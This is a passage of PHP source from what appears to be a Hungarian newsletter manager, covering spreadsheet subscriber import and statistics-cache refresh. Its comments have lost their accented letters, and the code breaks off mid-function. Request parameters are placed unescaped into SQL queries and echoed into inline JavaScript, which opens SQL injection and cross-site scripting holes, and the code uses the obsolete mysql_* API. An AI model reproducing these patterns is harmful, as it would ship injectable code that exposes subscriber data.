  $data = $this->_json_decode($this->m_array("select * from `".DB_PREFIX."import` where g='$g' and pid = '$pid' order by id", 'row'));

  $c = array();
  $fields = array();
  $vanreferer = 0;
  $feliratkozasideje = 0;

  foreach ($data as $cols) {
    $j++;
    $numcols++;
    $_NEV = mysql_real_escape_string(($cols));
    $tp = $this->inv_tp($_NEV, 1);
    $_NEV = $tp['str'];
    $tp = $tp['tp'];
    $sql = $this->mq("select * from ".DB_PREFIX."fields where g='$g' and name='" . $_NEV . "'");

    if ($cols == (__('Feliratkozs ideje'))) {
      $c[$j] = 'datum';
      $tim = $j;
      $feliratkozasideje = 1;
    } elseif ($cols == (__('IP cm'))) {
      $c[$j] = 'ip';
      $ip = $j;
    } elseif ($cols == (__('E-mail cm')) ||
      strtolower($cols) == (strtolower(__('E-mail'))) ||
      strtolower($cols) == (strtolower(__('Email')))) {
      $c[$j] = 'mail';
      $mail = $j;
    } elseif ($cols == (__('Sttusz'))) {
      $c[$j] = 'active';
      $status_id = $j;
    } elseif (strtolower($cols) == (__('id'))) {
      $c[$j] = 'id';
      $_ID_id = $j;
    } elseif (mysql_num_rows($sql)) { // h J Mez, de mr ltezik akkor hozzasduk a szmt
      $s = mysql_fetch_array($sql);
      $c[$j] = intval($s['id']);
      $tipus[$j] = $s['type'];
      $option[$j] = $s['option'];
      if ($tp) $tipus[$j] = $tp;

      if ($s['id'] == $ref_id) $vanreferer = 1;
					//megnzzk milyen tpus
      if ($s['type'] > 1) // beolvassuk a mezket.
      {
        $m_sql = $this->mq("select * from ".DB_PREFIX."fields_fields where field_id='$s[id]' order by CHAR_LENGTH(name) desc");
        $fields[$s['id']] = array();
        while ($m_s = mysql_fetch_assoc($m_sql)) $fields[$s['id']][$m_s['id']] = $m_s['name'];
      }
    } elseif ($cols) // ha viszont nem ltezik benne, akkor krelunk s persze van abba az oszlopba valami
    {
      $id = $this->a_i("".DB_PREFIX."fields");;
      $c[$j] = intval($id);
      if ($tp) $tipus[$j] = $tp;
      $this->mq("insert into ".DB_PREFIX."fields (g, name, hely, type) values
					 ('$g','" . $_NEV . "','$id', '$tp')");
    }
  }

  $_g = $this->m_array("select * from ".DB_PREFIX."groups where id='$g'");
  $now_time = $_POST['update_time'];
  $e_data = 0;
		// most feltljk adatokkal
  if (isset($_POST['kezd'])) $j = $_POST['kezd'];
  else $j = 1;

  if (!$this->m_array("select * from `".DB_PREFIX."sub_stat` where date=CURDATE() and g=$g"))
    $this->mq("insert into `".DB_PREFIX."sub_stat` (date, g, c) values (CURDATE(), '$g', 0)");

  $xrow = 2;
  if (isset($_POST['fp'])) $xrow = $_POST['fp'] + 1;

  for ($row = $xrow; $row <= $highestRow; $row++) // 2. sortl nzzk }
  {
    $data = $this->_json_decode($this->m_array("select * from `".DB_PREFIX."import` where x='$row' and g='$g' and pid = '$pid' order by id", 'row'));
    $j++;
    if (isset($_POST['kezd'])) if ($j <= $_POST['kezd']) continue;
				//$n=   ($data[$name-1]);
    $m = strtolower(str_replace(array(' ', chr(194), chr(160), "\r", "\n", "\n"), '', ($data[$mail - 1])));
    $t = ($data[$tim - 1]);
    $ip_v = ($data[$ip - 1]);
    if (!isset($data[$status_id - 1])) $data[$status_id - 1] = '';
    $s_x = ($data[$status_id - 1]);
    $___ID = ($data[$_ID_id - 1]); // xls-bern lv id, de ezzel nem foglalkozunk

    $m = strtolower($m);

    if ($status_id) {
      if ($s_x == __('Visszapattant')) $s_x = '2';
      elseif ($s_x == __('Inaktv')) $s_x = '0';
      elseif ($s_x == __('Aktv')) $s_x = '1';
      else $s_x = '4';
    } else $s_x = '4';    if ($a = preg_match("/^([0-9]{2})[\/]*([0-9]{2})[\/]*([0-9]{4})$/", $t, $b))
      $t = "$b[3]-$b[1]-$b[2]";

    $t = str_replace('.', '-', $t);
    $t = str_replace(' ', '', $t);


    if (preg_match("/^[0-9]{4}[-]*[0-9]{2}[-]*[0-9]{2}$/", $t) && $now_time) $t = "'$t'";
    else $t = 'CURDATE()';
			
//				if ( !$this->isValidEmail($m) || !$n) { $e_data++ ; $error=1; } 
    if (!$this->isValidEmail($m)) {
      $e_data++;
      $error = 1;
    } else // nincs hiba
    {
      $mail_id = '';
      $_SESSION['db_users']++;
      $id = 0;
      $ipdatum = 'now()';
      $v_C = $this->generateCode(40);

      if (!$_g['d_user']) // ha nincs tbbszrs feliratkozs - frisstnk
      {
        if ($s = $this->m_array("select * from ".DB_PREFIX."users where `g`='$g' and mail='$m'")) {
          $_SESSION['updated']++;
          $id = $s['id'];
          $ipdatum = "'$s[ipdatum]'";
          $mail_id = $s['mail_id'];
          if (!$feliratkozasideje) $t = "'$s[datum]'";
          if ($t == "''" || $t == "'0000-00-00'") $t = "'$s[datum]'";
          $_ip = $s['ip'];
          $omx = $s['omail'];
          $v_C = $s['verify_code'];
          $bounce = $s['bounce'];
          $u_id = $s['id'];
          $status_log = $s['status_log'];
          if ($s_x == '4') $s_x = $s['active'];
          $referer = $this->m_array("select * from ".DB_PREFIX."fields_data where `un`='$s[un]' and did='$ref_id'", 'text');
          $this->mq("delete from ".DB_PREFIX."users where `g`='$g' and mail='$m'");
          if (!$vanreferer) $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$id' and did!='$ref_id'");
          else $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$id'");
        }
      }

      if ($s_x == '4') $s_x = '1';

      $tg_vdvdvu_id = $id ? $id : $this->a_i("".DB_PREFIX."users");
      if (!$ip_v) $ip_v = $_ip;
      if (!isset($omx)) $omx = '';
      if (!isset($bounce)) $bounce = '';
      if (!isset($status_log)) $status_log = '';
					//$n=addslashes($n);
      $m = addslashes($m);
      $mail_id = $mail_id ? $mail_id : $this->mail_id($m);
					//$mail_id='0';
					
					// am
      $this->mq("insert into ".DB_PREFIX."users (`g`,   mail, omail, mail_id, datum, ip, active, verify_code, id, ipdatum, bounce, status_log) values 
					                   ('$g',  '$m', '$omx', '$mail_id', $t, '$ip_v', $s_x , '$v_C', '$id', $ipdatum, '$bounce', '$status_log')");

      $u_id = mysql_insert_id();
      $this->writeStatusLog($u_id, 'import', $s_x);
			$this->writeModLog($u_id);
      if (!$id) $this->mq("update `".DB_PREFIX."sub_stat` set c=c+1 where date=CURDATE() and g=$g");
					//egyb adatok beszrsa
      for ($i = 1; $i <= $numcols; $i++) {
        if (!isset($c[$i])) $c[$i] = '';
        if (is_int($c[$i])) {
          if (!isset($data[$i - 1])) $data[$i - 1] = '';
          $cols_string = (addslashes($data[$i - 1]));
          $field_id = $c[$i];

          $inttext = 0;
          if ($tipus[$i] == 5) // dtum
          {
            $cols_string = str_replace(' ', '', $cols_string);
            if (preg_match("/^([(0-9]+)?$/", $cols_string)) {
              $exc_date = (int)($cols_string);
              $cols_string = date('Y-m-d', ($exc_date - 25569) * 86400);
            }
										 //
										  //echo "insert into ".DB_PREFIX."fields_data (un, date, did) values ('$u_id','$cols_string', '".$c[$i]."')";
										  //die();
										  //if(preg_match("/^([(0-9]+)?$/", $cols_string)) $cols_string = date('Y-m-d', (( (int)($cols_string) - 25569)*3600*24 ) + 10);

            if ($cols_string) $this->mq("insert into ".DB_PREFIX."fields_data (un, date, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            continue;
          } elseif ($tipus[$i] == 6) //szm
          {
            $cols_string = str_replace(' ', '', $cols_string);
            if ($cols_string) $this->mq("insert into ".DB_PREFIX."fields_data (un, int_text, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            continue;
          } elseif ($tipus[$i] == 3) // checkbox
          {
            $cols_string .= ';';//$cols_string);
            $cols_string = str_replace('; ', ';', $cols_string);
            $arr = explode(';', $cols_string);
            $outt = array();
            foreach ($arr as $v0) {
              foreach ($fields[$field_id] as $k => $v)
                if ($v && $v == $v0) {
                $outt[] = $k;
                break;
              }
            }

            $cols_string = implode(';', $outt) . ';';
            if ($cols_string) $this->mq("insert into ".DB_PREFIX."fields_data (un, text, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            continue;
          } else {
            if (isset($fields[$field_id])) if (is_array($fields[$field_id])) // ha az adott mezbe cuccok vanak:
            {
              reset($fields[$field_id]);

              foreach ($fields[$field_id] as $k => $v) $cols_string = str_replace($v, $k, $cols_string);
              $cols_string = str_replace(' ', '', $cols_string);
              if (!strstr($cols_string, ';') && ($cols_string > 0 && $cols_string < 9223372036854775800)) $inttext = 1;	
									  //echo "cols:|$cols_string| - $inttext<br>";							  
            }

            if ($inttext) $this->mq("insert into ".DB_PREFIX."fields_data (un, int_text, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            else {
              if ($tipus[$i] == '0' && $option[$i] == '1') $cols_string = ucwords(mb_convert_case($cols_string, MB_CASE_TITLE, "UTF-8"));
              $this->mq("insert into ".DB_PREFIX."fields_data (un, text, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            }
          }
        }
      }
    }

    if (time() - $t_1 > 3) {
      echo '<script>
			  	var text = \'<div id="window_tartalom2"><h2 class="text-center">' . __('A fjl feldolgozsa folyamatban!').'</h2><p class="text-center">'. sprintf(__('%s sor ksz'), $j) . '</p></div>\';
				elohoz_n(text, true);
			  $(\'#window_tartalom2\').load(url, {g: ' . $_POST['g'] . ', txt_processing: 1, pid: \'' . $pid . '\', update_time: ' . $_POST['update_time'] . ', fp: ' . $row . ', kezd: ' . $j . '});</script>';
      exit;
    }

  }
  
	//fclose($handle);


  return " <h2>" . __('Sikeres importls!') . "</h2>
				" . sprintf(__('%s feliratkoz importlva.'), '<b>' . $_SESSION['db_users'] . '</b>') . " <br />
				" . sprintf(__('%s feliratkoz adata fellrva.'), '<b>' . $_SESSION['updated'] . '</b>') . " <br />
				" . sprintf(__('Az importls %s msodpercig tartott!'), '<b>' . (time() - $_SESSION['t1']) . '</b>');
}


function txt_processing2($g, $pid, $_X, $_Y)
{
  
  global $Referer_nev;

  $t_1 = time();
  $out = '';
  $TXT_B = 'run_xlsimport' . $g . $pid . $_X . $_Y;
  $TXT_A = 'run_xlsimport' . $g . $pid;

  $run = $this->conf_read($TXT_B);
  if (!$run) $this->conf_update($TXT_B, time());
  if ((time() - $run) < (30)) {
    echo "Now run....";
    die();
  } else {
    $this->conf_update($TXT_B, time());
  }

  echo 'Start<br>';


  $_ip = $this->getip();
  $updated = $j = $numcols = 0;

  $ref_id = $this->m_array("select * from `".DB_PREFIX."fields` where name='$Referer_nev' and g='$g_id'", 'id');
		// adatcsere:
  $tim = $ip = $name = $mail = $status_id = '';

  $data = $this->_json_decode($this->m_array("select * from `".DB_PREFIX."import` where g='$g' and pid = '$pid' order by id", 'row'));


  $c = array();
  $fields = array();
  $vanreferer = 0;
  $feliratkozasideje = 0;

  foreach ($data as $cols) {
    $j++;
    $numcols++;
    $_NEV = mysql_real_escape_string(($cols));
    $tp = $this->inv_tp($_NEV, 1);
    $_NEV = $tp['str'];
    $tp = $tp['tp'];
    $sql = $this->mq("select * from ".DB_PREFIX."fields where g='$g' and name='" . $_NEV . "'");

    if ($cols == (__('Feliratkozs ideje'))) {
      $c[$j] = 'datum';
      $tim = $j;
      $feliratkozasideje = 1;
    } elseif ($cols == (__('IP cm'))) {
      $c[$j] = 'ip';
      $ip = $j;
    } elseif ($cols == (__('E-mail cm')) ||
      strtolower($cols) == (strtolower(__('E-mail'))) ||
      strtolower($cols) == (strtolower(__('Email')))) {
      $c[$j] = 'mail';
      $mail = $j;
    } elseif ($cols == (__('Sttusz'))) {
      $c[$j] = 'active';
      $status_id = $j;
    } elseif (strtolower($cols) == (__('id'))) {
      $c[$j] = 'id';
      $_ID_id = $j;
    } elseif (mysql_num_rows($sql)) { // h J Mez, de mr ltezik akkor hozzasduk a szmt
      $s = mysql_fetch_array($sql);
      $c[$j] = intval($s['id']);
      $tipus[$j] = $s['type'];
      $option[$j] = $s['option'];
      if ($tp) $tipus[$j] = $tp;

      if ($s['id'] == $ref_id) $vanreferer = 1;
					//megnzzk milyen tpus
      if ($s['type'] > 1) // beolvassuk a mezket.
      {
        $m_sql = $this->mq("select * from ".DB_PREFIX."fields_fields where field_id='$s[id]' order by CHAR_LENGTH(name) desc");
        $fields[$s['id']] = array();
        while ($m_s = mysql_fetch_assoc($m_sql)) $fields[$s['id']][$m_s['id']] = $m_s['name'];
      }
    } elseif ($cols) // ha viszont nem ltezik benne, akkor krelunk s persze van abba az oszlopba valami
    {
      $id = $this->a_i("".DB_PREFIX."fields");;
      $c[$j] = intval($id);
      if ($tp) $tipus[$j] = $tp;
      $this->mq("insert into ".DB_PREFIX."fields (g, name, hely, type) values
					 ('$g','" . $_NEV . "','$id', '$tp')");
    }
  }

  $_g = $this->m_array("select * from ".DB_PREFIX."groups where id='$g'");
		//$now_time=$_GET['update_time'];
  $now_time = $_GET['update_time'];
  $e_data = 0;
		// most feltljk adatokkal
  if (isset($_POST['kezd'])) $j = $_POST['kezd'];
  else $j = 1;

  if (!$this->m_array("select * from `".DB_PREFIX."sub_stat` where date=CURDATE() and g=$g"))
    $this->mq("insert into `".DB_PREFIX."sub_stat` (date, g, c) values (CURDATE(), '$g', 0)");

  $xrow = 2;
  if (isset($_POST['fp'])) $xrow = $_POST['fp'] + 1;

  $XX__SQL = $this->mq("select * from `".DB_PREFIX."import` where pid='$pid' and g='$g' and mod(`id`,$_X)=$_Y and x!=1");
  while ($tmp = mysql_fetch_assoc($XX__SQL)) {
    $row = $tmp['x'];
    $this->mq("delete from `".DB_PREFIX."import` where id='$tmp[id]'");
    $data = $this->_json_decode($tmp['row']);
				//echo 'data';
				//printr($data);
    $j++;
				
				//$n=   ($data[$name-1]);
    $m = strtolower(str_replace(array(' ', chr(194), chr(160), "\r", "\n", "\n"), '', ($data[$mail - 1])));
    $t = ($data[$tim - 1]);
    $ip_v = ($data[$ip - 1]);
    if (!isset($data[$status_id - 1])) $data[$status_id - 1] = '';
    $s_x = ($data[$status_id - 1]);
    $___ID = ($data[$_ID_id - 1]); // xls-bern lv id, de ezzel nem foglalkozunk

    $m = strtolower($m);

    if ($status_id) {
      if ($s_x == __('Visszapattant')) $s_x = '2';
      elseif ($s_x == __('Inaktv')) $s_x = '0';
      elseif ($s_x == __('Aktv')) $s_x = '1';
      else $s_x = '4';
    } else $s_x = '4';

    if ($a = preg_match("/^([0-9]{2})[\/]*([0-9]{2})[\/]*([0-9]{4})$/", $t, $b))
      $t = "$b[3]-$b[1]-$b[2]";

    $t = str_replace('.', '-', $t);
    $t = str_replace(' ', '', $t);

    if (preg_match("/^[0-9]{4}[-]*[0-9]{2}[-]*[0-9]{2}$/", $t) && $now_time) $t = "'$t'";
    else $t = "CURDATE()";
			
//				if ( !$this->isValidEmail($m) || !$n) { $e_data++ ; $error=1; } 
    if (!$this->isValidEmail($m)) {
      $e_data++;
      $error = 1;
    } else // nincs hiba
    {
      $mail_id = '';
      $this->conf_update($TXT_A . 'db' . $_Y, $this->conf_read($TXT_A . 'db' . $_Y) + 1);

      $_SESSION['db_users']++;
      $id = 0;
      $ipdatum = 'now()';
      $v_C = $this->generateCode(40);

      if (!$_g['d_user']) // ha nincs tbbszrs feliratkozs - frisstnk
      {
        if ($s = $this->m_array("select * from ".DB_PREFIX."users where `g`='$g' and mail='$m'")) {
          $this->conf_update($TXT_A . 'upd' . $_Y, $this->conf_read($TXT_A . 'upd' . $_Y) + 1);
          $id = $s['id'];
          $ipdatum = "'$s[ipdatum]'";
          $mail_id = $s['mail_id'];
          $bounce = $s['bounce'];
          $_ip = $s['ip'];
          $omx = $s['omail'];
          if (!$feliratkozasideje) $t = "'$s[datum]'";
          if ($t == "''" || $t == "'0000-00-00'") $t = "'$s[datum]'";

          $v_C = $s['verify_code'];
          $u_id = $s['id'];
          $status_log = $s['status_log'];
							 
							 //if (!preg_match("/^[0-9]{4}[-]*[0-9]{2}[-]*[0-9]{2}$/", $data[$tim-1])) $t="'$s[datum]'";

          if ($s_x == '4') $s_x = $s['active'];
          $referer = $this->m_array("select * from ".DB_PREFIX."fields_data where `un`='$s[un]' and did='$ref_id'", 'text');
          $this->mq("delete from ".DB_PREFIX."users where `g`='$g' and mail='$m'");
							// if(!$vanreferer) $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$id' and did!='$ref_id'");
							//  else $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$id'");
        }
      }

      if ($s_x == '4') $s_x = '1';

      $tg_vdvdvu_id = $id ? $id : $this->a_i("".DB_PREFIX."users");
      if (!$ip_v) $ip_v = $_ip;
      if (!isset($omx)) $omx = '';
      if (!isset($bounce)) $bounce = '';
      if (!isset($status_log)) $status_log = '';
      $m = addslashes($m);
      $mail_id = $mail_id ? $mail_id : $this->mail_id($m);
					//$mail_id='0';
					
					// 
      $this->mq("insert into ".DB_PREFIX."users (`g`,   mail, omail, mail_id, datum, ip, active, verify_code, id, ipdatum, bounce, status_log) values 
					                   ('$g',  '$m', '$omx', '$mail_id', $t, '$ip_v', $s_x , '$v_C', '$id', $ipdatum, '$bounce', '$status_log')");

      $u_id = mysql_insert_id();
      $this->writeStatusLog($u_id, 'import', $s_x);
			$this->writeModLog($u_id);
      if (!$id) $this->mq("update `".DB_PREFIX."sub_stat` set c=c+1 where date=CURDATE() and g=$g");
					//egyb adatok beszrsa
      for ($i = 1; $i <= $numcols; $i++) {
        if (!isset($c[$i])) $c[$i] = '';
        if (is_int($c[$i])) {
          if (!isset($data[$i - 1])) $data[$i - 1] = '';
          $cols_string = (addslashes($data[$i - 1]));
          $field_id = $c[$i];

          $inttext = 0;
          if ($tipus[$i] == 5) // dtum
          {
            $cols_string = str_replace(array(' ', "'"), '', $cols_string);
            $cols_string = str_replace('.', '-', $cols_string);
            if (!$cols_string) $cols_string = '0000-00-00';

            if (preg_match("/^[0-9]{4}[-]*[0-9]{2}[-]*[0-9]{2}$/", $cols_string) && $now_time);
            else
              if (preg_match("/^([(0-9]+)?$/", $cols_string)) {
              $exc_date = (int)($cols_string);
              $cols_string = date('Y-m-d', ($exc_date - 25569) * 86400);
            }
										 //
										  //echo "insert into ".DB_PREFIX."fields_data (un, date, did) values ('$u_id','$cols_string', '".$c[$i]."')";
										  //die();
										  //if(preg_match("/^([(0-9]+)?$/", $cols_string)) $cols_string = date('Y-m-d', (( (int)($cols_string) - 25569)*3600*24 ) + 10);

            if ($cols_string) {
              $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$u_id' and did='" . $c[$i] . "'");
              $this->mq("insert into ".DB_PREFIX."fields_data (un, date, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            }
            continue;
          } elseif ($tipus[$i] == 6) //szm
          {
            $cols_string = str_replace(' ', '', $cols_string);
            if ($cols_string) {
              $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$u_id' and did='" . $c[$i] . "'");
              $this->mq("insert into ".DB_PREFIX."fields_data (un, int_text, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            }
            continue;
          } elseif ($tipus[$i] == 3) // checkbox
          {
            $cols_string .= ';';//$cols_string);
            $cols_string = str_replace('; ', ';', $cols_string);
            $arr = explode(';', $cols_string);
            $outt = array();
            foreach ($arr as $v0) {
              foreach ($fields[$field_id] as $k => $v)
                if ($v && $v == $v0) {
                $outt[] = $k;
                break;
              }
            }

            $cols_string = implode(';', $outt) . ';';
            if ($cols_string) {
              $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$u_id' and did='" . $c[$i] . "'");
              $this->mq("insert into ".DB_PREFIX."fields_data (un, text, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            }
            continue;
          } else {
            if (isset($fields[$field_id])) if (is_array($fields[$field_id])) // ha az adott mezbe cuccok vanak:
            {
              reset($fields[$field_id]);

              foreach ($fields[$field_id] as $k => $v) $cols_string = str_replace($v, $k, $cols_string);
              $cols_string = str_replace(' ', '', $cols_string);
              if (!strstr($cols_string, ';') && ($cols_string > 0 && $cols_string < 9223372036854775800)) $inttext = 1;	
									  //echo "cols:|$cols_string| - $inttext<br>";							  
            }

            if ($inttext) {
              $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$u_id' and did='" . $c[$i] . "'");
              $this->mq("insert into ".DB_PREFIX."fields_data (un, int_text, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            } else {
              if ($tipus[$i] == '0' && $option[$i] == '1') $cols_string = ucwords(mb_convert_case($cols_string, MB_CASE_TITLE, "UTF-8"));
              $this->mq("delete from ".DB_PREFIX."fields_data where `un`='$u_id' and did='" . $c[$i] . "'");
              $this->mq("insert into ".DB_PREFIX."fields_data (un, text, did) values ('$u_id','$cols_string', '" . $c[$i] . "')");
            }
          }
        }
      }
    }

    if (time() - $t_1 > 10) {
      $this->conf_delete($TXT_B);
      exit;
      die();
    }

  }
  
	//fclose($handle);}
function str_replace_deep($search, $replace, $subject)
{
  if (is_array($subject)) {
    foreach ($subject as &$oneSubject)
      $oneSubject = $this->str_replace_deep($search, $replace, $oneSubject);
    unset($oneSubject);
    return $subject;
  } else {
    return str_replace($search, $replace, $subject);
  }
}function ajax_send($v)
{
  $v = str_replace("'", "\'", $v);
  $v = str_replace("\n", '\n', $v);
  return $v;
}

function tiny_clean($text)
{
  $text = str_replace(array('\n', '\r'), array("\n", "\r"), $text);

  $text = str_replace(chr(194) . chr(160), ' ', $text); // utf-8as szkz lecsrlse rendes szkzre
  $text = str_replace('&amp;', '&', stripslashes($text));
  $text = str_replace(array('%7D', '%7B'), array('}', '{'), $text);

  $text = str_replace(array('http://{', 'https://{', '&amp;a={', '%7D', '%7B'), array('{', '{', '&a={', '}', '{'), $text);

  preg_match_all('/(<a.*?href=".*?{)(.*?)(}.*?".*?>)/', $text, $matches, PREG_SET_ORDER);
  foreach ($matches as $val) {
    $orig_str = $val[1] . $val[2] . $val[3];
    $new_str = $val[1] . str_replace('%20', ' ', $val[2]) . $val[3];
    $text = str_replace($orig_str, $new_str, $text);
  }

  return $text;
}


function stat_cache($date, $g, $up = -1, $down = -1, $send = -1, $read = -1)
{
  
  $sql = $this->mq("select * from `".DB_PREFIX."stat_cache` where `date`='$date' and `g`='$g'");
  if (!mysql_num_rows($sql))
    $this->mq("insert into `".DB_PREFIX."stat_cache` (`date`, `g`) values ('$date', '$g')");

  $set = ($up > -1 ? " ups='$up'" : '');
  $set .= ($down > -1 ? (($set ? ' ,' : '') . " `downs`='$down'") : '');
  $set .= ($send > -1 ? (($set ? ' ,' : '') . " `sendm`='$send'") : '');
  $set .= ($read > -1 ? (($set ? ' ,' : '') . " `rm`='$read'") : '');

  if ($set) {
    $this->mq("update `".DB_PREFIX."stat_cache` set $set where `date`='$date' and `g`='$g'");
    return 1;
  } else return 0;
}


function stat_cache_2($tp, $date, $mid, $sendout = -1, $read = -1, $link = -1)
{
  
  if ($tp == 'mail') $tp2 = 'mid';
  else $tp2 = 'act';

  $sql = $this->mq("select * from `".DB_PREFIX."stat_cache_$tp` where `date`='$date' and $tp2='$mid'");
  if (!mysql_num_rows($sql))
    $this->mq("insert into `".DB_PREFIX."stat_cache_$tp` (`date`, `$tp2`) values ('$date', '$mid')");

  $set = ($sendout > -1 ? " `sendout`='$sendout'" : '');
  $set .= ($read > -1 ? (($set ? ' ,' : '') . " `read`='$read'") : '');
  $set .= ($link > -1 ? (($set ? ' ,' : '') . " `link`='$link'") : '');

  if ($set) {
    $this->mq("update `".DB_PREFIX."stat_cache_$tp` set $set where `date`='$date' and `$tp2`='$mid'");
    return 1;
  } else return 0;
}
function kitolt_cache($date)
{
  
  global $_g; 
		//echo 'h: ', substr($date, 5,2), 'nap:',substr($date, 8,2), 'v',substr($date, 0,4);
  $dmk = mktime(0, 0, 0, substr($date, 5, 2), substr($date, 8, 2), substr($date, 0, 4));
		//die($dmk);
  for ($j = $dmk; $j < time(); $j += 24 * 3600) {
    $date = date('Y-m-d' . "\r\n", $j);
    if (!$this->m_array("select * from `".DB_PREFIX."stat_cache` where `g` = '$_g[id]' and date='$date'"))
      $this->mq("insert into `".DB_PREFIX."stat_cache` (g, date) values ('$_g[id]', '$date')");
  }
}


function stat_cache_refresh()
{
  

  $ustat_unix = $this->m_array("select UNIX_TIMESTAMP(date) as date from `".DB_PREFIX."stat_cache` order by `date` desc", 'date');
  if (!$ustat_unix) $ustat_unix = 0;
  $ustat_date = date("Y-m-d", $ustat_unix);
		
		// feliratkozsok szmnak tmentse:
  $sql = $this->mq("SELECT count( `datum` ) as `date_db`, datum, `g` FROM `".DB_PREFIX."users` where datum>='$ustat_date' group by `datum`, `g`");
  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    if (!$i) $this->kitolt_cache($s['datum']);
    $i++;
    $this->stat_cache($s['datum'], $s['g'], $s['date_db']);
			 //if($i>30) break;
  }
		
		// leiratkozsok tmsolsa a unscr tblbl

  $sql = $this->mq("select `date`, `g`, count(`mid`) as db from `".DB_PREFIX."unscr` where `date`>='$ustat_date' group by `date`, `g`");
  while ($s = mysql_fetch_assoc($sql)) {
    $this->stat_cache($s['date'], $s['g'], -1, $s['db']);
  }
		
		
		// kikldtt levelek szmnak tmentse:
		//SELECT count( `g` ) as `db`, FROM_UNIXTIME(`date`, '%Y-%m-%d') as D, `g` FROM `".DB_PREFIX."stat` where stat!='0000-00-00' group by `D`, `g`
  $sql = $this->mq("SELECT count( `g` ) as `db`, FROM_UNIXTIME(`date`, '%Y-%m-%d') as D0, `g` FROM `".DB_PREFIX."stat` where `date`>='$ustat_unix' group by `D0`, `g`");
  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    if (!$i) $this->kitolt_cache($s['D0']);
    $i++;
    $this->stat_cache($s['D0'], $s['g'], -1, -1, $s['db']);
  }
		
		// olvasott levelek szmnak tmentse:
  $sql = $this->mq("SELECT count( `g` ) as `db`, 
		FROM_UNIXTIME(`date`, '%Y-%m-%d') as D, `g`, `stat` FROM 
		`".DB_PREFIX."stat` where stat!='0000-00-00' and `date`>='$ustat_unix' group by `stat`, `g`");

  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    $i++;
    $this->stat_cache($s['stat'], $s['g'], -1, -1, -1, $s['db']);
			 //if($i>30) break;
  }
}

function kitolt_mail_cache($date)
{
  
		//global $_g;
		//echo 'h: ', substr($date, 5,2), 'nap:',substr($date, 8,2), 'v',substr($date, 0,4);
  $dmk = mktime(0, 0, 0, substr($date, 5, 2), substr($date, 8, 2), substr($date, 0, 4));
  for ($j = $dmk; $j < time(); $j += 24 * 3600) {
    $date = date('Y-m-d', $j);
    if (!$this->m_array("select * from `".DB_PREFIX."stat_cache_mail` where `mid` = '$_GET[mail_statid]' and date='$date'"))
      $this->mq("insert into `".DB_PREFIX."stat_cache_mail` (mid, date) values ('$_GET[mail_statid]', '$date')");
  }
}


function stat_cache_refresh_mail($mid)
{
  

  $ustat_unix = $this->m_array("select UNIX_TIMESTAMP(date) as date from `".DB_PREFIX."stat_cache_mail` where `mid`='$mid' order by `date` desc", 'date');
  if (!$ustat_unix) $ustat_unix = 1;
  $ustat_date = date("Y-m-d", $ustat_unix);
				
		// kikldsek szmnak tmentse
  $sql = $this->mq("SELECT 
			count( `mid` ) as `db`, 
			FROM_UNIXTIME(`date`, '%Y-%m-%d') as Di, `mid` 
				FROM `".DB_PREFIX."stat` 
					where `date`>='$ustat_unix' and mid='$mid' group by `Di`, `mid`");

  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    if (!$i) $this->kitolt_mail_cache($s['Di']);
    $i++;
    $this->stat_cache_2('mail', $s['Di'], $s['mid'], $s['db']);
			 //echo 'dtum:',$s['D'], ':',$s['db'],'<br>';
  }
		
		// olvasott levelek szmnak tmentse:
  $sql = $this->mq("SELECT count( `g` ) as `db`, 
		FROM_UNIXTIME(`date`, '%Y-%m-%d') as Di, `mid`, `stat` FROM 
		`".DB_PREFIX."stat` where stat!='0000-00-00' and `date`>='$ustat_unix' and mid='$mid' group by `stat`, `mid`");
  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    $i++;
			 // $this->stat_cache_2('mail', $s['Di'], $s['mid'], -1, $s['db']);
    $this->stat_cache_2('mail', $s['stat'], $s['mid'], -1, $s['db']);
//			 $this->stat_cache($s['stat'], $s['g'], -1,-1, -1, $s['db']);
			 //if($i>30) break;
  }
		
		// akcilinkek
  $sql = $this->mq("SELECT count( `mid` ) as `db`, FROM_UNIXTIME(`date`, '%Y-%m-%d') as Di, `mid` FROM `".DB_PREFIX."act_stat`
							 where stat!='0000-00-00 00:00:00' and `date`>='$ustat_unix' and mid='$mid' group by `Di`, `mid`");
  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    $i++;
    $this->stat_cache_2('mail', $s['Di'], $s['mid'], -1, -1, $s['db']);
  }

}function stat_cache_refresh_act($act, $g)
{
  
  $t = microtime(true);
  $this->mq("update `".DB_PREFIX."act_stat` set statid = (select id from `".DB_PREFIX."stat` where 
                  `".DB_PREFIX."stat`.`uid`=`".DB_PREFIX."act_stat`.`uid` and
                  `".DB_PREFIX."stat`.`date`=`".DB_PREFIX."act_stat`.`date` limit 0,1) where statid=0");

  $ustat_unix = $this->m_array("select UNIX_TIMESTAMP(date) as date from `".DB_PREFIX."stat_cache_act` where `act`='$act' order by `date` desc", 'date');

  if (!$ustat_unix) $ustat_unix = 1;
  $ustat_date = date("Y-m-d", $ustat_unix);		
		// kikldsek szmnak tmentse

  $sql = $this->mq("SELECT count( * ) as `db`, FROM_UNIXTIME(`date`, '%Y-%m-%d') as D, '$act' as `aid` FROM `".DB_PREFIX."stat` as s1
			 where g='$g' and date>='$ustat_unix' and ( select count(*) from ".DB_PREFIX."act_stat where aid='$act' and statid=s1.id) group by `D`");
  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    @set_time_limit(30);
    $i++;
